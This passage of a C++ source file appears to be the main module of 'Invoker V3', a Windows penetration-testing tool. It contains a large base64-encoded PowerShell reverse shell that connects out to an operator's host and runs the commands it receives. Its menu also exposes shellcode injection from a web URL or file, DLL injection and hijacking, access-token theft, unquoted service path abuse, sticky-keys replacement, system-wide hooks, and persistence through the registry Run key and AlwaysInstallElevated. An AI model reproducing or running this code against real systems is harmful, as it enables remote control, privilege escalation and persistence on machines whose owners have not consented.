AAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAA==");
	createFile("Invoker.doc", base64_decode(encoded));
}

void psReverseTcp() {
	print("############################### EXAMPLES ###############################");
	print("# IP   : 192.168.8.185                                                 #");
	print("# Port : 9000                                                          #");
	print("########################################################################");
	print("");
	// PowerShell encoded command
	std::string encoded = std::string("JABhAGQAZAByACAAPQAgACQAKABSAG").append("UAYQBkAC0ASABvAHMAdAAgAC0AUABy").append("AG8AbQBwAHQAIAAiAEUAbgB0AGUAcg").append("AgAEkAUAAgAGEAZABkAHIAZQBzAHMA").append("IgApAC4AVAByAGkAbQAoACkAOwANAA").append("oAVwByAGkAdABlAC0ASABvAHMAdAAg").append("ACIAIgA7AA0ACgAkAHAAbwByAHQAIA").append("A9ACAAJAAoAFIAZQBhAGQALQBIAG8A").append("cwB0ACAALQBQAHIAbwBtAHAAdAAgAC").append("IARQBuAHQAZQByACAAcABvAHIAdAAg").append("AG4AdQBtAGIAZQByACIAKQAuAFQAcg").append("BpAG0AKAApADsADQAKAFcAcgBpAHQA").append("ZQAtAEgAbwBzAHQAIAAiACIAOwANAA").append("oAaQBmACAAKAAkAGEAZABkAHIALgBM").append("AGUAbgBnAHQAaAAgAC0AbAB0ACAAMQ").append("AgAC0AbwByACAAJABwAG8AcgB0AC4A").append("TABlAG4AZwB0AGgAIAAtAGwAdAAgAD").append("EAKQAgAHsADQAKAAkAVwByAGkAdABl").append("AC0ASABvAHMAdAAgACIAQgBvAHQAaA").append("AgAHAAYQByAGEAbQBlAHQAZQByAHMA").append("IABhAHIAZQAgAHIAZQBxAHUAaQByAG").append("UAZAAiADsADQAKAH0AIABlAGwAcwBl").append("ACAAewANAAoACQBXAHIAaQB0AGUALQ").append("BIAG8AcwB0ACAAIgAjACMAIwAjACMA").append("IwAjACMAIwAjACMAIwAjACMAIwAjAC").append("MAIwAjACMAIwAjACMAIwAjACMAIwAj").append("ACMAIwAjACMAIwAjACMAIwAjACMAIw").append("AjACMAIwAjACMAIwAjACMAIwAjACMA").append("IwAjACMAIwAjACMAIwAjACMAIwAjAC").append("MAIwAjACMAIwAjACMAIwAjACMAIwAi").append("ADsADQAKAAkAVwByAGkAdABlAC0ASA").append("BvAHMAdAAgACIAIwAgACAAIAAgACAA").append("IAAgACAAIAAgACAAIAAgACAAIAAgAC").append("AAIAAgACAAIAAgACAAIAAgACAAIAAg").append("ACAAIAAgACAAIAAgACAAIAAgACAAIA").append("AgACAAIAAgACAAIAAgACAAIAAgACAA").append("IAAgACAAIAAgACAAIAAgACAAIAAgAC").append("AAIAAgACAAIAAgACAAIAAgACMAIgA7").append("AA0ACgAJAFcAcgBpAHQAZQAtAEgAbw").append("BzAHQAIAAiACMAIAAgACAAIAAgACAA").append("IAAgACAAIAAgACAAIAAgACAAIAAgAC").append("AAIAAgACAAIAAgACAAUABvAHcAZQBy").append("AFMAaABlAGwAbAAgAFIAZQB2AGUAcg").append("BzAGUAIABUAEMAUAAgACAAIAAgACAA").append("IAAgACAAIAAgACAAIAAgACAAIAAgAC").append("AAIAAgACAAIAAgACAAIAAjACIAOwAN").append("AAoACQBXAHIAaQB0AGUALQBIAG8Acw").append("B0ACAAIgAjACAAIAAgACAAIAAgACAA").append("IAAgACAAIAAgACAAIAAgACAAIAAgAC").append("AAIAAgACAAIAAgACAAIAAgACAAIAAg").append("ACAAIAAgACAAIAAgACAAIAAgACAAIA").append("AgAGIAeQAgAEkAdgBhAG4AIABTAGkA").append("bgBjAGUAawAgACAAIAAgACAAIAAgAC").append("AAIAAgACAAIAAgACAAIwAiADsADQAK").append("AAkAVwByAGkAdABlAC0ASABvAHMAdA").append("AgACIAIwAgACAAIAAgACAAIAAgACAA").append("IAAgACAAIAAgACAAIAAgACAAIAAgAC").append("AAIAAgACAAIAAgACAAIAAgACAAIAAg").append("ACAAIAAgACAAIAAgACAAIAAgACAAIA").append("AgACAAIAAgACAAIAAgACAAIAAgACAA").append("IAAgACAAIAAgACAAIAAgACAAIAAgAC").append("AAIAAgACAAIAAgACMAIgA7AA0ACgAJ").append("AFcAcgBpAHQAZQAtAEgAbwBzAHQAIA").append("AiACMAIABHAGkAdABIAHUAYgAgAHIA").append("ZQBwAG8AcwBpAHQAbwByAHkAIABhAH").append("QAIABnAGkAdABoAHUAYgAuAGMAbwBt").append("AC8AaQB2AGEAbgAtAHMAaQBuAGMAZQ").append("BrAC8AcABvAHcAZQByAHMAaABlAGwA").append("bAAtAHIAZQB2AGUAcgBzAGUALQB0AG").append("MAcAAuACAAIAAjACIAOwANAAoACQBX").append("AHIAaQB0AGUALQBIAG8AcwB0ACAAIg").append("AjACAARgBlAGUAbAAgAGYAcgBlAGUA").append("IAB0AG8AIABkAG8AbgBhAHQAZQAgAG").append("IAaQB0AGMAbwBpAG4AIABhAHQAIAAx").append("AEIAcgBaAE0ANgBUADcARwA5AFIATg").append("A4AHYAYgBhAGIAbgBmAFgAdQA0AE0A").append("NgBMAHAAZwB6AHQAcQA2AFkAMQA0AC").append("4AIAAgACAAIwAiADsADQAKAAkAVwBy").append("AGkAdABlAC0ASABvAHMAdAAgACIAIw").append("AgACAAIAAgACAAIAAgACAAIAAgACAA").append("IAAgACAAIAAgACAAIAAgACAAIAAgAC").append("AAIAAgACAAIAAgACAAIAAgACAAIAAg").append("ACAAIAAgACAAIAAgACAAIAAgACAAIA").append("AgACAAIAAgACAAIAAgACAAIAAgACAA").append("IAAgACAAIAAgACAAIAAgACAAIAAgAC").append("AAIAAgACMAIgA7AA0ACgAJAFcAcgBp").append("AHQAZQAtAEgAbwBzAHQAIAAiACMAIw").append("AjACMAIwAjACMAIwAjACMAIwAjACMA").append("IwAjACMAIwAjACMAIwAjACMAIwAjAC").append("MAIwAjACMAIwAjACMAIwAjACMAIwAj").append("ACMAIwAjACMAIwAjACMAIwAjACMAIw").append("AjACMAIwAjACMAIwAjACMAIwAjACMA").append("IwAjACMAIwAjACMAIwAjACMAIwAjAC").append("MAIwAjACIAOwANAAoACQAkAGMAbABp").append("AGUAbgB0ACAAPQAgACQAbgB1AGwAbA").append("A7AA0ACgAJACQAcwB0AHIAZQBhAG0A").append("IAA9ACAAJABuAHUAbABsADsADQAKAA").append("kAJABiAHUAZgBmAGUAcgAgAD0AIAAk").append("AG4AdQBsAGwAOwANAAoACQAkAHcAcg").append("BpAHQAZQByACAAPQAgACQAbgB1AGwA").append("bAA7AA0ACgAJACQAZABhAHQAYQAgAD").append("0AIAAkAG4AdQBsAGwAOwANAAoACQAk").append("AHIAZQBzAHUAbAB0ACAAPQAgACQAbg").append("B1AGwAbAA7AA0ACgAJAHQAcgB5ACAA").append("ewANAAoACQAJACMAIABjAGgAYQBuAG").append("cAZQAgAHQAaABlACAAaABvAHMAdAAg").append("AGEAZABkAHIAZQBzAHMAIABhAG4AZA").append("AvAG8AcgAgAHAAbwByAHQAIABuAHUA").append("bQBiAGUAcgAgAGEAcwAgAG4AZQBjAG").append("UAcwBzAGEAcgB5AA0ACgAJAAkAJABj").append("AGwAaQBlAG4AdAAgAD0AIABOAGUAdw").append("AtAE8AYgBqAGUAYwB0ACAATgBlAHQA").append("LgBTAG8AYwBrAGUAdABzAC4AVABjAH").append("AAQwBsAGkAZQBuAHQAKAAkAGEAZABk").append("AHIALAAgACQAcABvAHIAdAApADsADQ").append("AKAAkACQAkAHMAdAByAGUAYQBtACAA").append("PQAgACQAYwBsAGkAZQBuAHQALgBHAG").append("UAdABTAHQAcgBlAGEAbQAoACkAOwAN").append("AAoACQAJACQAYgB1AGYAZgBlAHIAIA").append("A9ACAATgBlAHcALQBPAGIAagBlAGMA").append("dAAgAEIAeQB0AGUAWwBdACAAMQAwAD").append("IANAA7AA0ACgAJAAkAJABlAG4AYwBv").append("AGQAaQBuAGcAIAA9ACAATgBlAHcALQ").append("BPAGIAagBlAGMAdAAgAFQAZQB4AHQA").append("LgBBAHMAYwBpAGkARQBuAGMAbwBkAG").append("kAbgBnADsADQAKAAkACQAkAHcAcgBp").append("AHQAZQByACAAPQAgAE4AZQB3AC0ATw").append("BiAGoAZQBjAHQAIABJAE8ALgBTAHQA").append("cgBlAGEAbQBXAHIAaQB0AGUAcgAoAC").append("QAcwB0AHIAZQBhAG0AKQA7AA0ACgAJ").append("AAkAJAB3AHIAaQB0AGUAcgAuAEEAdQ").append("B0AG8ARgBsAHUAcwBoACAAPQAgACQA").append("dAByAHUAZQA7AA0ACgAJAAkAVwByAG").append("kAdABlAC0ASABvAHMAdAAgACIAQgBh").append("AGMAawBkAG8AbwByACAAaQBzACAAdQ").append("BwACAAYQBuAGQAIAByAHUAbgBuAGkA").append("bgBnAC4ALgAuACIAOwANAAoACQAJAG").append("QAbwAgAHsADQAKAAkACQAJACQAdwBy").append("AGkAdABlAHIALgBXAHIAaQB0AGUAKA").append("AiAFAAUwA+ACIAKQA7AA0ACgAJAAkA").append("CQBkAG8AIAB7AA0ACgAJAAkACQAJAC").append("QAYgB5AHQAZQBzACAAPQAgACQAcwB0").append("AHIAZQBhAG0ALgBSAGUAYQBkACgAJA").append("BiAHUAZgBmAGUAcgAsACAAMAAsACAA").append("JABiAHUAZgBmAGUAcgAuAEwAZQBuAG").append("cAdABoACkAOwANAAoACQAJAAkACQBp").append("AGYAIAAoACQAYgB5AHQAZQBzACAALQ").append("BnAHQAIAAwACkAIAB7AA0ACgAJAAkA").append("CQAJAAkAJABkAGEAdABhACAAPQAgAC").append("QAZABhAHQAYQAgACsAIAAkAGUAbgBj").append("AG8AZABpAG4AZwAuAEcAZQB0AFMAdA").append("ByAGkAbgBnACgAJABiAHUAZgBmAGUA").append("cgAsACAAMAAsACAAJABiAHkAdABlAH").append("MAKQA7AA0ACgAJAAkACQAJAH0AIABl").append("AGwAcwBlACAAewANAAoACQAJAAkACQ").append("AJACQAZABhAHQAYQAgAD0AIAAiAGUA").append("eABpAHQAIgA7AA0ACgAJAAkACQAJAH").append("0ADQAKAAkACQAJAH0AIAB3AGgAaQBs").append("AGUAIAAoACQAcwB0AHIAZQBhAG0ALg").append("BEAGEAdABhAEEAdgBhAGkAbABhAGIA").append("bABlACkAOwANAAoACQAJAAkAaQBmAC").append("AAKAAkAGQAYQB0AGEALgBMAGUAbgBn").append("AHQAaAAgAC0AZwB0ACAAMAAgAC0AYQ").append("BuAGQAIAAkAGQAYQB0AGEAIAAtAG4A").append("ZQAgACIAZQB4AGkAdAAiACkAIAB7AA").append("0ACgAJAAkACQAJAHQAcgB5ACAAewAN").append("AAoACQAJAAkACQAJACQAcgBlAHMAdQ").append("BsAHQAIAA9ACAASQBuAHYAbwBrAGUA").append("LQBFAHgAcAByAGUAcwBzAGkAbwBuAC").append("AALQBDAG8AbQBtAGEAbgBkACAAJABk").append("AGEAdABhACAAfAAgAE8AdQB0AC0AUw").append("B0AHIAaQBuAGcAOwANAAoACQAJAAkA").append("CQB9ACAAYwBhAHQAYwBoACAAewANAA").append("oACQAJAAkACQAJACQAcgBlAHMAdQBs").append("AHQAIAA9ACAAJABfAC4ARQB4AGMAZQ").append("BwAHQAaQBvAG4ALgBJAG4AbgBlAHIA").append("RQB4AGMAZQBwAHQAaQBvAG4ALgBNAG").append("UAcwBzAGEAZwBlADsADQAKAAkACQAJ").append("AAkAfQANAAoACQAJAAkACQAkAHcAcg").append("BpAHQAZQByAC4AVwByAGkAdABlAEwA").append("aQBuAGUAKAAkAHIAZQBzAHUAbAB0AC").append("kAOwANAAoACQAJAAkACQBDAGwAZQBh").append("AHIALQBWAGEAcgBpAGEAYgBsAGUAIA").append("AtAE4AYQBtAGUAIAAiAGQAYQB0AGEA").append("IgA7AA0ACgAJAAkACQB9AA0ACgAJAA").append("kAfQAgAHcAaABpAGwAZQAgACgAJABk").append("AGEAdABhACAALQBuAGUAIAAiAGUAeA").append("BpAHQAIgApADsADQAKAAkAfQAgAGMA").append("YQB0AGMAaAAgAHsADQAKAAkACQBXAH").append("IAaQB0AGUALQBIAG8AcwB0ACAAJABf").append("AC4ARQB4AGMAZQBwAHQAaQBvAG4ALg").append("BJAG4AbgBlAHIARQB4AGMAZQBwAHQA").append("aQBvAG4ALgBNAGUAcwBzAGEAZwBlAD").append("sADQAKAAkAfQAgAGYAaQBuAGEAbABs").append("AHkAIAB7AA0ACgAJAAkAaQBmACAAKA").append("AkAHcAcgBpAHQAZQByACAALQBuAGUA").append("IAAkAG4AdQBsAGwAKQAgAHsADQAKAA").append("kACQAJACQAdwByAGkAdABlAHIALgBD").append("AGwAbwBzAGUAKAApADsADQAKAAkACQ").append("AJACQAdwByAGkAdABlAHIALgBEAGkA").append("cwBwAG8AcwBlACgAKQA7AA0ACgAJAA").append("kAfQANAAoACQAJAGkAZgAgACgAJABz").append("AHQAcgBlAGEAbQAgAC0AbgBlACAAJA").append("BuAHUAbABsACkAIAB7AA0ACgAJAAkA").append("CQAkAHMAdAByAGUAYQBtAC4AQwBsAG").append("8AcwBlACgAKQA7AA0ACgAJAAkACQAk").append("AHMAdAByAGUAYQBtAC4ARABpAHMAcA").append("BvAHMAZQAoACkAOwANAAoACQAJAH0A").append("DQAKAAkACQBpAGYAIAAoACQAYwBsAG").append("kAZQBuAHQAIAAtAG4AZQAgACQAbgB1").append("AGwAbAApACAAewANAAoACQAJAAkAJA").append("BjAGwAaQBlAG4AdAAuAEMAbABvAHMA").append("ZQAoACkAOwANAAoACQAJAAkAJABjAG").append("wAaQBlAG4AdAAuAEQAaQBzAHAAbwBz").append("AGUAKAApADsADQAKAAkACQB9AA0ACg").append("AJAAkAaQBmACAAKAAkAGIAdQBmAGYA").append("ZQByACAALQBuAGUAIAAkAG4AdQBsAG").append("wAKQAgAHsADQAKAAkACQAJACQAYgB1").append("AGYAZgBlAHIALgBDAGwAZQBhAHIAKA").append("ApADsADQAKAAkACQB9AA0ACgAJAAkA").append("aQBmACAAKAAkAGQAYQB0AGEAIAAtAG").append("4AZQAgACQAbgB1AGwAbAApACAAewAN").append("AAoACQAJAAkAQwBsAGUAYQByAC0AVg").append("BhAHIAaQBhAGIAbABlACAALQBOAGEA").append("bQBlACAAIgBkAGEAdABhACIAOwANAA").append("oACQAJAH0ADQAKAAkACQBpAGYAIAAo").append("ACQAcgBlAHMAdQBsAHQAIAAtAG4AZQ").append("AgACQAbgB1AGwAbAApACAAewANAAoA").append("CQAJAAkAQwBsAGUAYQByAC0AVgBhAH").append("IAaQBhAGIAbABlACAALQBOAGEAbQBl").append("ACAAIgByAGUAcwB1AGwAdAAiADsADQ").append("AKAAkACQB9AA0ACgAJAH0ADQAKAH0A").append("DQAKAA==");
	// more about the script at github.com/ivan-sincek/powershell-reverse-tcp
	psExec(encoded);
}

void cppDownloadFile() {
	std::string url = input("Enter URL");
	print("");
	std::string out = input("Enter output file");
	print("");
	if (url.length() < 1 || out.length() < 1) {
		print("Both parameters are required");
	}
	else {
		downloadFile(url, out);
	}
}

void cppAddEditRegKey() {
	print("############################### EXAMPLES ###############################");
	print("# Hive   : HKEY_CURRENT_USER | HKEY_LOCAL_MACHINE                      #");
	print("# Subkey : Software\\Microsoft\\Windows\\CurrentVersion\\Run               #");
	print("# Name   : PowerShell                                                  #");
	print("# Data   : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe   #");
	print("#----------------------------------------------------------------------#");
	print("# Hive   : HKEY_CURRENT_USER | HKEY_LOCAL_MACHINE                      #");
	print("# Subkey : Software\\Policies\\Microsoft\\Windows\\Installer               #");
	print("# Name   : AlwaysInstallElevated                                       #");
	print("# Data   : 1                                                           #");
	print("################################# INFO #################################");
	print("# In combination with the second example, use an MSI payload.          #");
	print("########################################################################");
	print("");
	print("############################ REGISTRY HIVES ############################");
	print("# [1] HKEY_CLASSES_ROOT                                                #");
	print("# [2] HKEY_CURRENT_USER                                                #");
	print("# [3] HKEY_LOCAL_MACHINE                                               #");
	print("# [4] HKEY_USERS                                                       #");
	print("# [5] HKEY_CURRENT_CONFIG                                              #");
	print("########################################################################");
	std::string choice = input("Choose registry hive");
	print("");
	HKEY hKey = NULL;
	if (choice == "1") {
		hKey = HKEY_CLASSES_ROOT;
	}
	else if (choice == "2") {
		hKey = HKEY_CURRENT_USER;
	}
	else if (choice == "3") {
		hKey = HKEY_LOCAL_MACHINE;
	}
	else if (choice == "4") {
		hKey = HKEY_USERS;
	}
	else if (choice == "5") {
		hKey = HKEY_CURRENT_CONFIG;
	}
	else {
		print("Invalid choice");
	}
	if (hKey != NULL) {
		std::string subkey = input("Enter subkey");
		print("");
		std::string name = input("Enter value name");
		print("");
		std::string data = input("Enter value data");
		print("");
		std::string confirm = input("Confirm (yes)");
		if (confirm == "yes") {
			print("");
			createRegKey(&hKey, subkey, name, data);
		}
	}
}

void cppScheduleTask() {
	print("############################### EXAMPLES ###############################");
	print("# Name : CMD                                                           #");
	print("# User : Kira                                                          #");
	print("# File : C:\\Windows\\System32\\cmd.exe                                   #");
	print("# Args : /K WHOAMI /PRIV                                               #");
	print("#----------------------------------------------------------------------#");
	print("# Name : PowerShell                                                    #");
	print("# User : Administrator                                                 #");
	print("# File : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe     #");
	print("################################# INFO #################################");
	print("# Task will trigger only once, after exactly one minute.               #");
	print("########################################################################");
	print("");
	std::string name = input("Enter task name");
	print("");
	std::string user = input("Enter user name");
	print("");
	std::string file = input("Enter file name");
	print("");
	std::string args = input("Enter file arguments (optional)");
	print("");
	if (name.length() < 1 || user.length() < 1 || file.length() < 1) {
		print("Required parameters are missing");
	}
	else {
		scheduleTask(name, user, file, args);
	}
}

void cppReverseTcp() {
	print("############################### EXAMPLES ###############################");
	print("# IP   : 192.168.8.185                                                 #");
	print("# Port : 9000                                                          #");
	print("########################################################################");
	print("");
	std::string ip = input("Enter IP address");
	print("");
	std::string port = input("Enter port number");
	print("");
	if (ip.length() < 1 || port.length() < 1) {
		print("Both parameters are required");
	}
	else if (!isPositiveNumber(port)) {
		print("Port number must be a positive number");
	}
	else {
		reverseTcp(ip, atoi(port.c_str()));
	}
}

void cppTerminateProcess() {
	int pid = getProcessId();
	if (pid != -1) {
		terminateProcess(pid);
	}
}

void cppRunProcess() {
	print("############################### EXAMPLES ###############################");
	print("# File : C:\\Windows\\System32\\cmd.exe                                   #");
	print("# Args : /K WHOAMI /PRIV                                               #");
	print("#----------------------------------------------------------------------#");
	print("# File : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe     #");
	print("########################################################################");
	print("");
	std::string file = input("Enter file name");
	print("");
	std::string args = input("Enter file arguments (optional)");
	print("");
	if (file.length() < 1) {
		print("File name is rquired");
	}
	else {
		runProcess(file, args);
	}
}

void cppInjectBytcodeWeb() {
	print("############################### EXAMPLES ###############################");
	print("# URL  : pastebin.com/raw/Nd1tCBv6                                     #");
	print("# Port : 80                                                            #");
	print("################################# INFO #################################");
	print("# This method does not yet support HTTPS.                              #");
	print("########################################################################");
	print("");
	std::string url = input("Enter URL");
	print("");
	std::string port = input("Enter port number");
	print("");
	if (url.length() < 1 || port.length() < 1) {
		print("Both parameters are required");
	}
	else if (!isPositiveNumber(port)) {
		print("Port number must be a positive number");
	}
	else {
		std::string data = getWebContent(url, atoi(port.c_str()));
		if (data.length() > 0) {
			// NOTE: Change the custom element here (make sure it is unique).
			// NOTE: Make sure to enclose the payload from both front and back.
			const std::string element = "<img class=\"bc\" src=\"data:image/gif;base64,payload\" alt=\"bc\" hidden=\"hidden\">";
			// NOTE: Change the payload placeholder here (make sure it is unique within the elemenet).
			const std::string placeholder = "payload";
			std::string payload = extractPayload(data, element, placeholder);
			if (payload.length() > 0) {
				print("");
				int pid = getProcessId();
				if (pid != -1) {
					// NOTE: Change the payload decoder here or omit it.
					payload = base64_decode(payload);
					injectBytecode(pid, payload);
				}
			}
		}
	}
}

void cppInjectBytcodeFile() {
	print("############################### EXAMPLES ###############################");
	print("# File : C:\\Users\\Kira\\Downloads\\payload.bin                           #");
	print("########################################################################");
	print("");
	std::string file = input("Enter file name");
	print("");
	if (file.length() < 1) {
		print("File name is required");
	}
	else {
		std::string payload = readFile(file);
		if (payload.length() > 0) {
			int pid = getProcessId();
			if (pid != -1) {
				injectBytecode(pid, payload);
			}
		}
	}
}

void cppInjectDll() {
	print("############################### EXAMPLES ###############################");
	print("# File : C:\\Users\\Kira\\Downloads\\payload.dll                           #");
	print("################################# INFO #################################");
	print("# You cannot inject a 32-bit DLL into a 64-bit process nor vice versa. #");
	print("########################################################################");
	print("");
	std::string file = input("Enter file name");
	print("");
	if (file.length() < 1) {
		print("File name is required");
	}
	else {
		int pid = getProcessId();
		if (pid != -1) {
			injectDll(pid, file);
		}
	}
}

void cppDllHijacking() {
	int pid = getProcessId();
	if (pid != -1) {
		listDlls(pid);
		print("");
		print("################################# INFO #################################");
		print("# This method will not list missing DLLs, only loaded ones.            #");
		print("#----------------------------------------------------------------------#");
		print("# Rename your \"payload.dll\" to any of the listed DLLs and replace it.  #");
		print("# Some directories will require a write permission.                    #");
		print("# Restart the process if needed.                                       #");
		print("# Some processes may crash or not work properly afterwards.            #");
		print("########################################################################");
	}
}

void cppEnableAccessTokenPrivs() {
	enableAccessTokenPrivs();
}

void cppDuplicateAccessToken() {
	print("############################### EXAMPLES ###############################");
	print("# File : C:\\Windows\\System32\\cmd.exe                                   #");
	print("# Args : /K WHOAMI /PRIV                                               #");
	print("# PID  : 3301                                                          #");
	print("#----------------------------------------------------------------------#");
	print("# File : C:\\Users\\Kira\\Downloads\\Invoker.exe                           #");
	print("# PID  : 3301                                                          #");
	print("########################################################################");
	print("");
	std::string file = input("Enter file name");
	print("");
	std::string args = input("Enter file arguments (optional)");
	print("");
	if (file.length() < 1) {
		print("File name is rquired");
	}
	else {
		int pid = getProcessId();
		if (pid != -1) {
			HANDLE hToken = duplicateAccessToken(pid);
			if (hToken != NULL) {
				print("");
				runProcess(file, args, &hToken);
				CloseHandle(hToken);
			}
		}
	}
}

void cppUnquotedServicePaths() {
	std::string name = getUnquotedServiceName();
	if (name.length() > 0) {
		print("[1] Start   ");
		print("[2] Stop    ");
		print("[3] Restart ");
		print("------------");
		std::string choice = input("Your choice");
		print("");
		if (choice == "1") {
			manipulateService(name, 1);
		}
		else if (choice == "2") {
			manipulateService(name, 2);
		}
		else if (choice == "3") {
			manipulateService(name, 3);
		}
		else {
			print("Invalid choice");
		}
	}
}

void cppReplaceStickyKeys() {
	replaceStickyKeys();
}

// NOTE: Structure is defined in ".\lib\invoker.h".
hook data = { "", NULL, false };

void cppInstallWindowsHook() {
	if (!data.active) {
		print("############################### EXAMPLES ###############################");
		print("# File : C:\\Users\\Kira\\Downloads\\InvokerHook.dll                       #");
		print("################################# INFO #################################");
		print("# 32-bit DLLs (i.e. hooks) will only apply to 32-bit processes.        #");
		print("# 64-bit DLLs (i.e. hooks) will only apply to 64-bit processes.        #");
		print("########################################################################");
		std::string file = input("Enter file name");
		print("");
		if (file.length() < 1) {
			print("File name is rquired");
		}
		else {
			data.file = file;
			data.hThread = createHookThread(&data);
		}
	}
	else {
		std::string confirm = input("Uninstall hook procedure (yes)");
		if (confirm == "yes") {
			data.active = false;
			WaitForSingleObject(data.hThread, INFINITE);
			CloseHandle(data.hThread);
		}
	}
}

int main() {
	SetConsoleTitle("Invoker");
	std::string choice = "0";
	do {
		system("CLS");
		print("########################################################################");
		print("#                                                                      #");
		print("#                              Invoker V3                              #");
		print("#                                    by Ivan Sincek                    #");
		print("#                                                                      #");
		print("# Penetration testing utility.                                         #");
		print("# GitHub repository at github.com/ivan-sincek/invoker.                 #");
		print("# Feel free to donate bitcoin at 1BrZM6T7G9RN8vbabnfXu4M6Lpgztq6Y14.   #");
		print("#                                                                      #");
		print("########################################################################");
		print("# [ 0]            Exit                                                 #");
		print("########################################################################");
		print("# [ 1] [SYSTEM]   Invoke CMD                                           #");
		print("# [ 2] [SYSTEM]   Invoke PS                                            #");
		print("#----------------------------------------------------------------------#");
		print("# [ 3] [MS WORD]  Invoke CMD & PS                                      #");
		print("#----------------------------------------------------------------------#");
		print("# [ 4] [PS]       Reverse TCP                                          #");
		print("#----------------------------------------------------------------------#");
		print("# [ 5] [C++]      Download File                                        #");
		print("# [ 6] [C++]      Add/Edit Registry Key                                #");
		print("# [ 7] [C++]      Schedule Task                                        #");
		print("# [ 8] [C++]      Reverse TCP                                          #");
		print("# [ 9] [C++]      Terminate Process                                    #");
		print("# [10] [C++]      Run Process                                          #");
		print("# [11] [C++]      Inject Bytecode From Web                             #");
		print("# [12] [C++]      Inject Bytecode From File                            #");
		print("# [13] [C++]      Inject DLL                                           #");
		print("# [14] [C++]      DLL Hijacking                                        #");
		print("# [15] [C++]      Enable Access Token Privileges                       #");
		print("# [16] [C++]      Duplicate Access Token                               #");
		print("# [17] [C++]      Unquoted Service Paths                               #");
		print("# [18] [C++]      Replace Sticky Keys                                  #");
		print("# [19] [C++]      Install Windows Hook From DLL                        #");
		print("########################################################################");
		choice = input("Your choice");
		if (isPositiveNumber(choice)) {
			int ch = atoi(choice.c_str());
			if (ch >= 1 && ch <= 19) {
				system("CLS");
				switch (ch) {
					case  1: { systemInvokeCmd();           break; }
					case  2: { systemInvokePs();            break; }
					case  3: { msInvokeAll();               break; }
					case  4: { psReverseTcp();              break; }
					case  5: { cppDownloadFile();           break; }
					case  6: { cppAddEditRegKey();          break; }
					case  7: { cppScheduleTask();           break; }
					case  8: { cppReverseTcp();             break; }
					case  9: { cppTerminateProcess();       break; }
					case 10: { cppRunProcess();             break; }
					case 11: { cppInjectBytcodeWeb();       break; }
					case 12: { cppInjectBytcodeFile();      break; }
					case 13: { cppInjectDll();              break; }
					case 14: { cppDllHijacking();           break; }
					case 15: { cppEnableAccessTokenPrivs(); break; }
					case 16: { cppDuplicateAccessToken();   break; }
					case 17: { cppUnquotedServicePaths();   break; }
					case 18: { cppReplaceStickyKeys();      break; }
					case 19: { cppInstallWindowsHook();     break; }
				}
				print("");
				system("PAUSE");
			}
		}
	} while (choice != "0");
	return 0;
}

